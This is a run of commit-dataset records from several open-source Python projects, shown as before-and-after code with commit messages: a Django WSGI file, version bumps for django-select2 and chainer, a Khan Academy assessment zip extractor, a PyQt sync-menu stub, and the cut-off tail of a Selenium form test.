url = self.live_server_url + self.getURL('create-space')
self.browser.get(url)
self.wait(2)
# Now we fill the create space form
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('test_space')
url_field = self.browser.find_element_by_name('url')
url_field.send_keys('test_url')
logo_field = self.browser.find_element_by_name('logo')
logo_field.send_keys(os.getcwd()+'/generic.jpeg')
banner_field = self.browser.find_element_by_name('banner')
banner_field.send_keys(os.getcwd()+'/generic.jpeg')
self.wait(2)
#url_field.send_keys(Keys.RETURN)
banner_field.submit()
self.wait(300)
|
|
4c875e312b35e19392c395da1bfe75bf61137b0b
|
marco/marco/wsgi_web468.py
|
marco/marco/wsgi_web468.py
|
"""WSGI File for Web468
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "marco.settings")
activate_this = '/home/point97/env/marco_portal2/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
Add wsgi file for 468
|
Add wsgi file for 468
|
Python
|
isc
|
MidAtlanticPortal/marco-portal2,MidAtlanticPortal/marco-portal2,MidAtlanticPortal/marco-portal2,Ecotrust/marineplanner-core,Ecotrust/marineplanner-core,Ecotrust/marineplanner-core,Ecotrust/marineplanner-core,MidAtlanticPortal/marco-portal2,Ecotrust/marineplanner-core
|
Add wsgi file for 468
|
"""WSGI File for Web468
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "marco.settings")
activate_this = '/home/point97/env/marco_portal2/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
<commit_before><commit_msg>Add wsgi file for 468<commit_after>
|
"""WSGI File for Web468
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "marco.settings")
activate_this = '/home/point97/env/marco_portal2/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
Add wsgi file for 468"""WSGI File for Web468
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "marco.settings")
activate_this = '/home/point97/env/marco_portal2/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
<commit_before><commit_msg>Add wsgi file for 468<commit_after>"""WSGI File for Web468
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "marco.settings")
activate_this = '/home/point97/env/marco_portal2/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
|
e184f5fea6425bc90ed1077fdd9cbacbaa12383e
|
django_select2/__init__.py
|
django_select2/__init__.py
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.0"
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.1"
|
Bump version number because v5.0.0 was taken on pypi due to a mistake
|
Bump version number because v5.0.0 was taken on pypi due to a mistake
|
Python
|
apache-2.0
|
DMOJ/django-select2,DMOJ/django-select2,anneFly/django-select2,anneFly/django-select2,applegrew/django-select2,rizumu/django-select2,anneFly/django-select2,applegrew/django-select2,rizumu/django-select2,rizumu/django-select2,applegrew/django-select2,DMOJ/django-select2
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.0"
Bump version number because v5.0.0 was taken on pypi due to a mistake
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.1"
|
<commit_before># -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.0"
<commit_msg>Bump version number because v5.0.0 was taken on pypi due to a mistake<commit_after>
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.1"
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.0"
Bump version number because v5.0.0 was taken on pypi due to a mistake# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.1"
|
<commit_before># -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.0"
<commit_msg>Bump version number because v5.0.0 was taken on pypi due to mistake<commit_after># -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.1"
|
06ba899aaaf5b8ff47c8ed6f317076c43d3351a0
|
chainer/__init__.py
|
chainer/__init__.py
|
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
import pkg_resources
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
__version__ = pkg_resources.get_distribution('chainer').version
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
Add version number to chainer module
|
Add version number to chainer module
|
Python
|
mit
|
t-abe/chainer,umitanuki/chainer,masia02/chainer,1986ks/chainer,benob/chainer,jnishi/chainer,ktnyt/chainer,AlpacaDB/chainer,sou81821/chainer,tscohen/chainer,okuta/chainer,Kaisuke5/chainer,keisuke-umezawa/chainer,pfnet/chainer,benob/chainer,hvy/chainer,kiyukuta/chainer,chainer/chainer,chainer/chainer,elviswf/chainer,kuwa32/chainer,keisuke-umezawa/chainer,jnishi/chainer,jnishi/chainer,ysekky/chainer,wkentaro/chainer,ktnyt/chainer,tereka114/chainer,muupan/chainer,minhpqn/chainer,t-abe/chainer,woodshop/chainer,hvy/chainer,bayerj/chainer,sinhrks/chainer,woodshop/complex-chainer,tigerneil/chainer,kikusu/chainer,cupy/cupy,AlpacaDB/chainer,okuta/chainer,wkentaro/chainer,chainer/chainer,ktnyt/chainer,niboshi/chainer,wkentaro/chainer,sinhrks/chainer,tkerola/chainer,ktnyt/chainer,keisuke-umezawa/chainer,cemoody/chainer,cupy/cupy,kikusu/chainer,okuta/chainer,chainer/chainer,aonotas/chainer,cupy/cupy,delta2323/chainer,muupan/chainer,ronekko/chainer,laysakura/chainer,wkentaro/chainer,yanweifu/chainer,ytoyama/yans_chainer_hackathon,anaruse/chainer,hidenori-t/chainer,hvy/chainer,okuta/chainer,rezoo/chainer,niboshi/chainer,niboshi/chainer,truongdq/chainer,jfsantos/chainer,wavelets/chainer,keisuke-umezawa/chainer,cupy/cupy,truongdq/chainer,kashif/chainer,jnishi/chainer,hvy/chainer,ikasumi/chainer,niboshi/chainer
|
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
Add version number to chainer module
|
import pkg_resources
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
__version__ = pkg_resources.get_distribution('chainer').version
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
<commit_before>from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
<commit_msg>Add version number to chainer module<commit_after>
|
import pkg_resources
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
__version__ = pkg_resources.get_distribution('chainer').version
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
Add version number to chainer moduleimport pkg_resources
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
__version__ = pkg_resources.get_distribution('chainer').version
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
<commit_before>from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
<commit_msg>Add version number to chainer module<commit_after>import pkg_resources
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
__version__ = pkg_resources.get_distribution('chainer').version
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
d7beafc221bbd54038654a87c680577b251d93de
|
extract_khan_assessment.py
|
extract_khan_assessment.py
|
"""
extract_khan_assessment
Creates a khan_assessment.zip, fully compatible with KA Lite 0.15.x and below,
from a full content pack.
Usage:
extract_khan_assessment.py <content-pack-path> [<out-path>]
"""
import logging
import zipfile
from docopt import docopt
from pathlib import Path
ASSESSMENT_FOLDER_IN_ZIP = "khan/" # Note: this should just be imported from the contentpacks module
def extract_khan_assessment(contentpackpath: Path, outpath: Path):
with zipfile.ZipFile(str(contentpackpath)) as cf,\
zipfile.ZipFile(str(outpath), "w") as of:
items = list(i for i in cf.namelist()
if ASSESSMENT_FOLDER_IN_ZIP in i)
logging.info("Writing {} items to {}".format(
len(items),
outpath)
)
for item in items:
bytes = cf.read(item)
# the relative_to call removes the leading khan/ in the item's path
new_item_name = Path(item).relative_to(ASSESSMENT_FOLDER_IN_ZIP)
of.writestr(str(new_item_name), bytes)
logging.info("great success.")
def main():
args = docopt(__doc__)
logging.basicConfig()
contentpackpath = Path(args["<content-pack-path>"])
outpath = Path(args["<out-path>"] or "out/khan_assessment.zip")
outpath = outpath.expanduser()
extract_khan_assessment(contentpackpath, outpath)
if __name__ == "__main__":
main()
|
Create a script to extract khan assessment resources.
|
Create a script to extract khan assessment resources.
And place them into their own zip file. New zip file is compatible with
khan_assessment.zip from KA Lite releases 0.15.x and below.
|
Python
|
bsd-2-clause
|
fle-internal/content-pack-maker
|
Create a script to extract khan assessment resources.
And place them into their own zip file. New zip file is compatible with
khan_assessment.zip from KA Lite releases 0.15.x and below.
|
"""
extract_khan_assessment
Creates a khan_assessment.zip, fully compatible with KA Lite 0.15.x and below,
from a full content pack.
Usage:
extract_khan_assessment.py <content-pack-path> [<out-path>]
"""
import logging
import zipfile
from docopt import docopt
from pathlib import Path
ASSESSMENT_FOLDER_IN_ZIP = "khan/" # Note: this should just be imported from the contentpacks module
def extract_khan_assessment(contentpackpath: Path, outpath: Path):
with zipfile.ZipFile(str(contentpackpath)) as cf,\
zipfile.ZipFile(str(outpath), "w") as of:
items = list(i for i in cf.namelist()
if ASSESSMENT_FOLDER_IN_ZIP in i)
logging.info("Writing {} items to {}".format(
len(items),
outpath)
)
for item in items:
bytes = cf.read(item)
# the relative_to call removes the leading khan/ in the item's path
new_item_name = Path(item).relative_to(ASSESSMENT_FOLDER_IN_ZIP)
of.writestr(str(new_item_name), bytes)
logging.info("great success.")
def main():
args = docopt(__doc__)
logging.basicConfig()
contentpackpath = Path(args["<content-pack-path>"])
outpath = Path(args["<out-path>"] or "out/khan_assessment.zip")
outpath = outpath.expanduser()
extract_khan_assessment(contentpackpath, outpath)
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Create a script to extract khan assessment resources.
And place them into their own zip file. New zip file is compatible with
khan_assessment.zip from KA Lite releases 0.15.x and below.<commit_after>
|
"""
extract_khan_assessment
Creates a khan_assessment.zip, fully compatible with KA Lite 0.15.x and below,
from a full content pack.
Usage:
extract_khan_assessment.py <content-pack-path> [<out-path>]
"""
import logging
import zipfile
from docopt import docopt
from pathlib import Path
ASSESSMENT_FOLDER_IN_ZIP = "khan/" # Note: this should just be imported from the contentpacks module
def extract_khan_assessment(contentpackpath: Path, outpath: Path):
with zipfile.ZipFile(str(contentpackpath)) as cf,\
zipfile.ZipFile(str(outpath), "w") as of:
items = list(i for i in cf.namelist()
if ASSESSMENT_FOLDER_IN_ZIP in i)
logging.info("Writing {} items to {}".format(
len(items),
outpath)
)
for item in items:
bytes = cf.read(item)
# the relative_to call removes the leading khan/ in the item's path
new_item_name = Path(item).relative_to(ASSESSMENT_FOLDER_IN_ZIP)
of.writestr(str(new_item_name), bytes)
logging.info("great success.")
def main():
args = docopt(__doc__)
logging.basicConfig()
contentpackpath = Path(args["<content-pack-path>"])
outpath = Path(args["<out-path>"] or "out/khan_assessment.zip")
outpath = outpath.expanduser()
extract_khan_assessment(contentpackpath, outpath)
if __name__ == "__main__":
main()
|
Create a script to extract khan assessment resources.
And place them into their own zip file. New zip file is compatible with
khan_assessment.zip from KA Lite releases 0.15.x and below."""
extract_khan_assessment
Creates a khan_assessment.zip, fully compatible with KA Lite 0.15.x and below,
from a full content pack.
Usage:
extract_khan_assessment.py <content-pack-path> [<out-path>]
"""
import logging
import zipfile
from docopt import docopt
from pathlib import Path
ASSESSMENT_FOLDER_IN_ZIP = "khan/" # Note: this should just be imported from the contentpacks module
def extract_khan_assessment(contentpackpath: Path, outpath: Path):
with zipfile.ZipFile(str(contentpackpath)) as cf,\
zipfile.ZipFile(str(outpath), "w") as of:
items = list(i for i in cf.namelist()
if ASSESSMENT_FOLDER_IN_ZIP in i)
logging.info("Writing {} items to {}".format(
len(items),
outpath)
)
for item in items:
bytes = cf.read(item)
# the relative_to call removes the leading khan/ in the item's path
new_item_name = Path(item).relative_to(ASSESSMENT_FOLDER_IN_ZIP)
of.writestr(str(new_item_name), bytes)
logging.info("great success.")
def main():
args = docopt(__doc__)
logging.basicConfig()
contentpackpath = Path(args["<content-pack-path>"])
outpath = Path(args["<out-path>"] or "out/khan_assessment.zip")
outpath = outpath.expanduser()
extract_khan_assessment(contentpackpath, outpath)
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Create a script to extract khan assessment resources.
And place them into their own zip file. New zip file is compatible with
khan_assessment.zip from KA Lite releases 0.15.x and below.<commit_after>"""
extract_khan_assessment
Creates a khan_assessment.zip, fully compatible with KA Lite 0.15.x and below,
from a full content pack.
Usage:
extract_khan_assessment.py <content-pack-path> [<out-path>]
"""
import logging
import zipfile
from docopt import docopt
from pathlib import Path
ASSESSMENT_FOLDER_IN_ZIP = "khan/" # Note: this should just be imported from the contentpacks module
def extract_khan_assessment(contentpackpath: Path, outpath: Path):
with zipfile.ZipFile(str(contentpackpath)) as cf,\
zipfile.ZipFile(str(outpath), "w") as of:
items = list(i for i in cf.namelist()
if ASSESSMENT_FOLDER_IN_ZIP in i)
logging.info("Writing {} items to {}".format(
len(items),
outpath)
)
for item in items:
bytes = cf.read(item)
# the relative_to call removes the leading khan/ in the item's path
new_item_name = Path(item).relative_to(ASSESSMENT_FOLDER_IN_ZIP)
of.writestr(str(new_item_name), bytes)
logging.info("great success.")
def main():
args = docopt(__doc__)
logging.basicConfig()
contentpackpath = Path(args["<content-pack-path>"])
outpath = Path(args["<out-path>"] or "out/khan_assessment.zip")
outpath = outpath.expanduser()
extract_khan_assessment(contentpackpath, outpath)
if __name__ == "__main__":
main()
|
|
f755060a8999a1d6ba007f24dda9d00b9bb9d5dd
|
UI/sunc_menu.py
|
UI/sunc_menu.py
|
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from qt_interfaces.sync_menu_ui import Ui_SyncMenu
# Synchronization menu section #
class SyncMenuUI(QtGui.QMainWindow):
def __init__(self, parent=None,):
QtGui.QWidget.__init__(self, parent)
self.sync_menu_ui = Ui_SyncMenu()
self.sync_menu_ui.setupUi(self)
# start synchronization action
QtCore.QObject.connect(
self.sync_menu_ui.start_sync_bt,
QtCore.SIGNAL('clicked()'),
self.start_sync_action)
def start_sync_action(self):
return 1
def stop_sync_action(self):
return 1
def update_current_main_sync_stats(self, stats_array):
self.sync_menu_ui.successfully_synced_files_count.setText(stats_array["successfully_synced_files_count"])
return 1
|
Add sync menu backend init
|
Add sync menu backend init
|
Python
|
mit
|
lakewik/storj-gui-client
|
Add sync menu backend init
|
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from qt_interfaces.sync_menu_ui import Ui_SyncMenu
# Synchronization menu section #
class SyncMenuUI(QtGui.QMainWindow):
def __init__(self, parent=None,):
QtGui.QWidget.__init__(self, parent)
self.sync_menu_ui = Ui_SyncMenu()
self.sync_menu_ui.setupUi(self)
# start synchronization action
QtCore.QObject.connect(
self.sync_menu_ui.start_sync_bt,
QtCore.SIGNAL('clicked()'),
self.start_sync_action)
def start_sync_action(self):
return 1
def stop_sync_action(self):
return 1
def update_current_main_sync_stats(self, stats_array):
self.sync_menu_ui.successfully_synced_files_count.setText(stats_array["successfully_synced_files_count"])
return 1
|
<commit_before><commit_msg>Add sync menu backend init<commit_after>
|
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from qt_interfaces.sync_menu_ui import Ui_SyncMenu
# Synchronization menu section #
class SyncMenuUI(QtGui.QMainWindow):
def __init__(self, parent=None,):
QtGui.QWidget.__init__(self, parent)
self.sync_menu_ui = Ui_SyncMenu()
self.sync_menu_ui.setupUi(self)
# start synchronization action
QtCore.QObject.connect(
self.sync_menu_ui.start_sync_bt,
QtCore.SIGNAL('clicked()'),
self.start_sync_action)
def start_sync_action(self):
return 1
def stop_sync_action(self):
return 1
def update_current_main_sync_stats(self, stats_array):
self.sync_menu_ui.successfully_synced_files_count.setText(stats_array["successfully_synced_files_count"])
return 1
|
Add sync menu backend init# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from qt_interfaces.sync_menu_ui import Ui_SyncMenu
# Synchronization menu section #
class SyncMenuUI(QtGui.QMainWindow):
def __init__(self, parent=None,):
QtGui.QWidget.__init__(self, parent)
self.sync_menu_ui = Ui_SyncMenu()
self.sync_menu_ui.setupUi(self)
# start synchronization action
QtCore.QObject.connect(
self.sync_menu_ui.start_sync_bt,
QtCore.SIGNAL('clicked()'),
self.start_sync_action)
def start_sync_action(self):
return 1
def stop_sync_action(self):
return 1
def update_current_main_sync_stats(self, stats_array):
self.sync_menu_ui.successfully_synced_files_count.setText(stats_array["successfully_synced_files_count"])
return 1
|
<commit_before><commit_msg>Add sync menu backend init<commit_after># -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from qt_interfaces.sync_menu_ui import Ui_SyncMenu
# Synchronization menu section #
class SyncMenuUI(QtGui.QMainWindow):
def __init__(self, parent=None,):
QtGui.QWidget.__init__(self, parent)
self.sync_menu_ui = Ui_SyncMenu()
self.sync_menu_ui.setupUi(self)
# start synchronization action
QtCore.QObject.connect(
self.sync_menu_ui.start_sync_bt,
QtCore.SIGNAL('clicked()'),
self.start_sync_action)
def start_sync_action(self):
return 1
def stop_sync_action(self):
return 1
def update_current_main_sync_stats(self, stats_array):
self.sync_menu_ui.successfully_synced_files_count.setText(stats_array["successfully_synced_files_count"])
return 1
|